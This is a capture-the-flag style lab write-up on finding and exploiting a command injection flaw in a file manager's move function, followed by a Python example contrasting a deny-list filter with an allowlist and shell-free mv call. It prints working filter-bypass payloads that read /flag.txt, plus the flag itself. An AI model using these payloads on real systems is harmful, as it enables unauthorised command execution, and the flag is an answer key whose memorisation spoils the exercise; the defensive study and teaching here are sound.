Skills Assessment
Task
You are contracted to perform a penetration test for a company, and through your pentest, you stumble upon an interesting file manager web application. As file managers tend to execute system commands, you are interested in testing for command injection vulnerabilities.
Use the various techniques presented in this module to detect a command injection vulnerability and then exploit it, evading any filters in place.
What is the content of ‘/flag.txt’?
Attempt
Since this is an OS command injection task, I first looked for the most system-related function on the page. I tried to move a file and got this error: Error while moving: mv: '/var/www/html/files/51459716.txt' and '/var/www/html/files/51459716.txt' are the same file.
Looks like the system uses the mv command, and when I specify the same file that command fails. Captured the request in Burp:
GET /index.php?to=&from=51459716.txt&finish=1&move=1 HTTP/1.1
Host: 94.237.59.30:50049
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.59.30:50049/index.php?to=&from=51459716.txt
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fm04b3rht5ibn7cqtivt9hukh8; filemanager=u8eiqp9e9ccn3aq92krq3sg03r
Connection: keep-alive
I injected ;whoami; into both the to and from parameters and got the message <p class="message alert">Malicious request denied!</p>. The payload to=&whoami&from=&whoami& passed, but for & to work in the URL I needed to URL-encode it.
This payload worked:
/index.php?to=%26wh'o'ami&from=%26'i'd&finish=1&move=1
Result:
Error while moving: id: '/var/www/html/files/': no such user
mv: missing destination file operand after '/var/www/html/files/'
Try 'mv --help' for more information.
www-data
So I confirmed I could inject the payload into the to parameter.
Final payload:
/index.php?to=%26c'a't%09${PATH:0:1}flag.txt&from=%26'i'd&finish=1&move=1
Got the flag:
<p class="message alert">Error while moving: HTB{c0mm4nd3r_1nj3c70r}<br>
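As an added example (not code from the write-up or from the target application), here is the defender-side view of the same move function: a deny-list filter approximating the one met above beside an allowlist check and an mv invocation that never goes through a shell. The files directory is taken from the error messages above; the deny-list pattern, the allowlist and all function names are assumptions.

```python
import re
import subprocess
from pathlib import Path

# Directory seen in the mv error messages of the write-up.
FILES_DIR = Path("/var/www/html/files")

# Assumed approximation of the filter met during the assessment: it rejected
# ';' and a plain space, but let '&', quotes, a tab and ${PATH:0:1} through.
DENY_LIST = re.compile(r"[; ]")

# Allowlist: one bare file name (letters, digits, '_', '.', '-'), nothing else.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def deny_list_allows(value: str) -> bool:
    """Mimic the deny-list filter: True when the value would be let through."""
    return DENY_LIST.search(value) is None


def validate_name(value: str) -> str:
    """Allowlist check. Raise ValueError for anything that is not a bare file name."""
    if not SAFE_NAME.fullmatch(value) or value in (".", ".."):
        raise ValueError(f"rejected file name: {value!r}")
    return value


def build_move_command(src: str, dst: str) -> list[str]:
    """Build argv for mv. No shell is involved, so metacharacters have no meaning."""
    src_path = FILES_DIR / validate_name(src)
    dst_path = FILES_DIR / validate_name(dst)
    # '--' stops mv from treating a name beginning with '-' as an option.
    return ["mv", "--", str(src_path), str(dst_path)]


def move_file(src: str, dst: str) -> None:
    """Perform the move with an argument list; the file names are never parsed by sh."""
    subprocess.run(build_move_command(src, dst), check=True)
```

The deny-list check passes the URL-decoded payloads from this page, while the allowlist rejects every one of them and accepts only the plain 51459716.txt.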